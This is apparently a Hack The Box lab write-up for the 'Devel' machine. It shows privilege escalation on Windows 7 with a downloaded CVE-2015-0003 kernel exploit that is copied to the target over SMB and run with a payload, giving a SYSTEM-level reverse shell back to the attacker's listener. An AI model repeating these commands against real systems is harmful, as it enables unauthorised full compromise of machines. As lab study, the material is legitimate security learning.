CVE-2015-0003(MS15-010)
It certainly matches the target operating system
i found this exploit online
┌──(kali㉿kali)-[~/…/htb/labs/devel/kernelbuster]
└─$ wget https://github.com/Ascotbe/Kernelhub/raw/master/CVE-2015-0003/CVE-2015-0003_x86.exeI downloaded the file via wget
c:\tmp>copy \\10.10.14.6\smb\CVE-2015-0003_x86.exe
copy \\10.10.14.6\smb\CVE-2015-0003_x86.exe
1 file(s) copied.Transport over SMB
c:\tmp>CVE-2015-0003_x86.exe
CVE-2015-0003_x86.exe
HT Windows Font Exploit modify by skyer
usage: exp.exe "net user t00ls t00ls /ad"Instruction seems easy enough
c:\tmp>CVE-2015-0003_x86.exe "C:\tmp\pe.exe"
cve-2015-0003_x86.exe "c:\tmp\pe.exe"I supplied the payload as the command
┌──(kali㉿kali)-[~/archive/htb/labs/devel]
└─$ nnc 1234
listening on [any] 1234 ...
connect to [10.10.14.6] from (UNKNOWN) [10.10.10.5] 49162
Microsoft Windows [Version 6.1.7600]
Copyright (c) 2009 Microsoft Corporation. All rights reserved.
c:\tmp>whoami
whoami
nt authority\system
c:\tmp>hostname
hostname
devel
c:\tmp>ipconfig
ipconfig
Windows IP Configuration
ethernet adapter local area connection 3:
connection-specific dns suffix . :
ipv6 address. . . . . . . . . . . : dead:beef::58c0:f1cf:abc6:bb9e
temporary ipv6 address. . . . . . : dead:beef::f1e5:9b02:27b6:d459
link-local ipv6 address . . . . . : fe80::58c0:f1cf:abc6:bb9e%15
ipv4 address. . . . . . . . . . . : 10.10.10.5
subnet mask . . . . . . . . . . . : 255.255.255.0
default gateway . . . . . . . . . : fe80::250:56ff:feb9:6c92%15
10.10.10.2
tunnel adapter isatap.{c57f02f8-df4f-40ee-bc21-a206b3f501e4}:
media state . . . . . . . . . . . : Media disconnected
connection-specific dns suffix . :
tunnel adapter local area connection* 9:
media state . . . . . . . . . . . : Media disconnected
connection-specific dns suffix . : System Level Compromise